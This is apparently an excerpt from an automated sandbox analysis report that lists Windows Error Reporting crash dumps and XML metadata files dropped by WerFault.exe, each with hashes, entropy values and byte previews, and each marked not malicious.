                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8342
                                                      Entropy (8bit):3.6992341015383485
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5CQ6I6YAcSUBjzGgmfB/SUCpBB89byNsfWmm:RrlsNij6I6YrSUB2gmf5SQyGf+
                                                      MD5:3E834C70597B2529120F36D767D1BE79
                                                      SHA1:19ED9B3D7B2E64CA1BF9ED0597AE0EE5F1F4EC06
                                                      SHA-256:64F961DEF4DA2BA5BD5894E2264CF676E9C7538A07A6BE68B896E2833C9710BE
                                                      SHA-512:2BF8486C5ACDC571BA2593C1C42EF7A9F19FCBC3AD6555BF2E73FEDE500403F775D8FDB5AB851C412F532169EE02CE4FF5145BDDEA3C1EC4BBB03F999AA90D22
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER158E.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.471603162291742
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zs7JgtWI9AuWgc8sqYjd8fm8M4JbFZFDD+q86f1urZMjTCd:uITfV7PgrsqYWJxbT1urZMXCd
                                                      MD5:B91CE91AD0E94110E3A3D685A0701528
                                                      SHA1:757608C17F154106ACB5A81F6C38BF5FB383FD0B
                                                      SHA-256:1BC6E1FFFFECACD3A76BD023D16A3505459EB52BD3735DEC821E8C11AB0E0025
                                                      SHA-512:8F894BA4E34A914A4C741F5D78097ED51431F478D8F4361CF3633E004E1BA1FFE83AC803C79A3D8108B7F52145DEB0881EF9ECF85FEAA3D80E9AD9242312E146
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719931" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER44BE.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:19:43 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):56454
                                                      Entropy (8bit):2.182319360691112
                                                      Encrypted:false
                                                      SSDEEP:192:g8oeAakOUlXbtOPoV6pLGkIIfnbNJAJgfn+oqGyQTaY/MEPhx+M9OswPx:AeZUlXsPrVJJnnxqkj/FJxax
                                                      MD5:A8DC68277E07305CB1BCAE53CCF2E72C
                                                      SHA1:A469D877A870A353BAA9DE1C4F196AA934C67ECC
                                                      SHA-256:8552B8BF2701243D5991559FFA2F570B38759C47C969548154106041167A37A3
                                                      SHA-512:E3F267C03C9DBB302959B358785C9100A865FE4EC7C3F6F4177B369549E25452ACCED10394F4C1DF32F189FDB7B1A6CFC1C68C0261D13E254A0D69F1FAD68DB7
                                                      Malicious:false
                                                      Preview:MDMP....... ........|;c........................\................-..........T.......8...........T...........(...^...........X...........D....................................................................U...........B..............GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER477F.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8308
                                                      Entropy (8bit):3.6977526531042657
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cf6db6YA9/SUHBgmfB/SUCpBg89bVNsf+gnm:RrlsNik6x6YCSUHBgmf5SjVGf+d
                                                      MD5:2C981C43D1D7DF745D60E7665A21FCF2
                                                      SHA1:7C2F59629175C42AF2523862F6CC68110ED79126
                                                      SHA-256:5EB23E0BD94E3186DCACD94BBB963BBB7A1BB94FE82AF1EA5F2CCDDBAA0995C7
                                                      SHA-512:674A9AC3BE5B0406A6F3D35815E93F2AC7DDB8FC2F02EE045386C81A7DA189AFCFAD15DA1DBB64C89BBB646A922B81A9DC04F8CE71BFA2AF77CF063AD218E197
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER484B.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.469873205149838
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjs8fm8M4JbFZFFx+q86f1urZMjTCd:uITfaH7PgrsqY1JxBxT1urZMXCd
                                                      MD5:2EF698F17D8FB44FFBA9AEC9B57A6A36
                                                      SHA1:C4C683B97F4D405FAE8A9F021CB4E90A3FDA6035
                                                      SHA-256:C7A5B9426DF54B57501DA138D5121787431358F293BF572F1BC0B280DCCE8456
                                                      SHA-512:7BC5A712C48AF0D54BAF893DD4F14B939D660AD1AF7303F5EA41E51FC9987285B6A53C7E74E6C01DF2ACD3D9D4E34CF08B6B13CF00A6E2CA0AA4E770E22CB78F
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5190.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:19:47 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):69530
                                                      Entropy (8bit):2.259219992382273
                                                      Encrypted:false
                                                      SSDEEP:384:0ATIjWPYZRPo1pGtSBQlttbaqKl/5zFCig:1dPYnQpH4tp5KlBZg
                                                      MD5:D7A7A6F4AAAEF024F8CA5F12F62B28B7
                                                      SHA1:CA2DFAD12878C28FAB17250011952156F088310C
                                                      SHA-256:922EC18A6DE3309A556C01E6772B27A8AB852E1C3BD11B761D6637A6046E7F89
                                                      SHA-512:1C8B7A30BB39B11DA4A1043285E6448A8D76BBA7E3A08B66F2C60CF7E8F5FDA3F08D36D07560349603A26022BA71F1643F92F2643205650C1C50C157C230323F
                                                      Malicious:false
                                                      Preview:MDMP....... .......#|;c............$...........4...,............1..........T.......8...........T...........................`...........L....................................................................U...........B..............GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER54AE.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8326
                                                      Entropy (8bit):3.6991087145639527
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Cj16mL6YALSUoegmfB/SUCpBQ89b+NsfHKm:RrlsNi216S6YcSUoegmf5Sz+Gfb
                                                      MD5:C204E3BE429BA3B3F5F5F081440C97CE
                                                      SHA1:90C554D757AD14B2B5D81A5D6643158236392311
                                                      SHA-256:1568E26B1C14210EEF3E3B7450648FD4DBE08495AE147AE48CA3E97DBE4B2BBF
                                                      SHA-512:1AA0E8B4B88B8BC172C03A89F7B16185CE4A8C61BF80D341E8D8F0165D79049E256CCD6D7586680930DEAA52B7D5AC2BE2A2B8EA1834285CC5ACE03064064383
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER554B.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.471028777924174
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjG8fm8M4JbFZF+Ni+q86f1urZMjTCd:uITfaH7PgrsqYXJxSMT1urZMXCd
                                                      MD5:DC0935D6C6D598B93B449EF04F780D02
                                                      SHA1:58093A6DAA527A70975CBF3A6012BB78BE9100EE
                                                      SHA-256:0E37569669EC3B03F4A70183187380615D4BC74FD880120AEC32D89174B058F1
                                                      SHA-512:CA08E05AE354FDEF161B0E26C187CF5719F91B1A775465FB082D39B2834103F84839612BDCD1FC0299D2496B1543A6F786D6BC32C768F1715AFFFE39D0C26491
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D48.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:19:50 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):85304
                                                      Entropy (8bit):1.9912019045374547
                                                      Encrypted:false
                                                      SSDEEP:192:zhFUUKV6djzjXtOPoAshqN+ZMi6RApkzUypb8ioqGQQTa6/oEPwrGUQ7PaNDQdbo:zbj/jnwPxRoZIHbbaqKl/5IrL+AD
                                                      MD5:B37A07B55B2344E803ED8DE04DFA004E
                                                      SHA1:52EC8FA5AE299BFAEF82E4DFAA3C431959AEFE9A
                                                      SHA-256:A23892B995DD2E292DFD078B5E9C8706978BA5928C08B95E0FB8F212C24515F6
                                                      SHA-512:B5EDE0E9EF63FAAC5796E0EFCA56148DF0741E343E8BE7960BE8A66AE6ACCD53EFF7FD6D11E4B185C0BF0877AEC29F65752F34A4C8B1CC5D668028EE735BF1ED
                                                      Malicious:false
                                                      Preview:MDMP....... .......&|;c........................4................:..........T.......8...........T...........p..../...........................................................................................U...........B......t.......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER5FD9.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.700678655856191
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Ca6IMZU6YAGSUoegmfB/SUCpBU89bANsfigm:RrlsNiZ6IMZU6YhSUoegmf5S/AGfU
                                                      MD5:EAE3A5FDB4EA5B635139E1AF94E9B77E
                                                      SHA1:5CBBC1A3E25343C553FA80E8EB1FEF6870F54455
                                                      SHA-256:C26EE7683ECBC44E746F2B42E68A23996217FE35228E47564E4DB4D7E9E8078E
                                                      SHA-512:6DB7A3CFB4FE50BBE78366B7432C0DE0987FF253B33288E9814B24474F3F25491BF1E3731133453570420B27682BDAEFB1338998D15C4B4E3FFB6DD950F09981
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER6067.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.464969653058695
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYjW8fm8M4JbFZFKP+q86f1urZMjTCd:uITfaH7PgrsqYHJxuPT1urZMXCd
                                                      MD5:E7845EEC2C7325C6E460F2BE7D8F053C
                                                      SHA1:2755E2C714FBC45CD212EC07A65E0640A8713628
                                                      SHA-256:A4A780B7E2E13AB87087AAEA1254B327CFB63FD290BD5491DE99AC81EAA2427D
                                                      SHA-512:2E2BA70C124E49ED22632ACA4A0D5E6E0AE8A2C6C7F1C6B277F07A7196CB17742E78B8761242BF263138F87A9D2533C0298DA9FDDC2104E4AF719D8477E331C4
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8050.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:19:59 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):84744
                                                      Entropy (8bit):1.9995885291711986
                                                      Encrypted:false
                                                      SSDEEP:192:wFKqKV6djLtOPoQl+qOzLS6RApDcZkB3+wypb8ioqGQQTa6/oEPibmuMSMOjK:Qn/j8PBlZo1LOM3baqKl/5qbm3uK
                                                      MD5:029F619E8D1FD3E831759AD1A5E06607
                                                      SHA1:BC0C344FBA7AE7C6BE489972AD79FCB2DB53922A
                                                      SHA-256:1B4CDFE154A9BC1F5D060A5E7ACDA2445A1D0D128ACC8FC3C9888159F491A672
                                                      SHA-512:5E7B0FDAFD989125EB7DC24796DE0EFBBA2D9DE532761790997CA108861AA0D62058C2DC1A6CA5B791B76404C9B5699D6842B04586A46A1FDC8D7DCE102083DB
                                                      Malicious:false
                                                      Preview:MDMP....... ......./|;c........................4................:..........T.......8...........T...........p....-...........................................................................................U...........B......t.......GenuineIntelW...........T.......X....|;c.............................0..2...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8311.tmp.WERInternalMetadata.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):8330
                                                      Entropy (8bit):3.700346427387162
                                                      Encrypted:false
                                                      SSDEEP:192:Rrl7r3GLNi5Ct6IMZzT6YAFSUlnnegmfB/SUCpBcf89bBNsfADSLm:RrlsNiu6IMZn6YSSU9egmf5SCgBGfU
                                                      MD5:FD51AA1EC5CE83C635FC198CD6AC0D1E
                                                      SHA1:AF0156269CF3BEBCCD640038CF8FC04531C700ED
                                                      SHA-256:0A1E0FED4B0E099CC7ED04E5E1F5A13E66764FD8F9A917CA1CC29832F3F6B5AE
                                                      SHA-512:B9DA5056A1718356E97710E70FDB3BA006E262408B21389CC8CC9E94DA0B62E3CD95D8FC19E5E944BD348D849291404B23746920F8F93FD7AED2231F182FBCE1
                                                      Malicious:false
                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.6.4.<./.P.i.d.>.......

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER83DD.tmp.xml

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):4573
                                                      Entropy (8bit):4.469003753104554
                                                      Encrypted:false
                                                      SSDEEP:48:cvIwSD8zsatJgtWI9AuWgc8sqYj28fm8M4JbFZFy+q86f1urZMjTCd:uITfaH7PgrsqY3JxeT1urZMXCd
                                                      MD5:83F3E3785892865061A47850D8C06839
                                                      SHA1:63304DE6F224017F57C94D916C37AB129094882F
                                                      SHA-256:049ABF21B7337934D6DEF3F3CD73AFD24C35D69F2F2C9F9AD255505FB8F55BA6
                                                      SHA-512:1BAD9FF6D8D83B6F2B12CD438835964FA703AB70B5D0BCC708621D491635B9DA9707D95DDCC79B58FC826FBEA0EB409977D03E2671F734215B899445C5DFEB7C
                                                      Malicious:false
                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1719930" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WER8B0E.tmp.dmp

                                                      Download File
                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                      File Type:Mini DuMP crash report, 14 streams, Tue Oct 4 00:20:01 2022, 0x1205a4 type
                                                      Category:dropped
                                                      Size (bytes):84776
                                                      Entropy (8bit):2.038490417036477
                                                      Encrypted:false
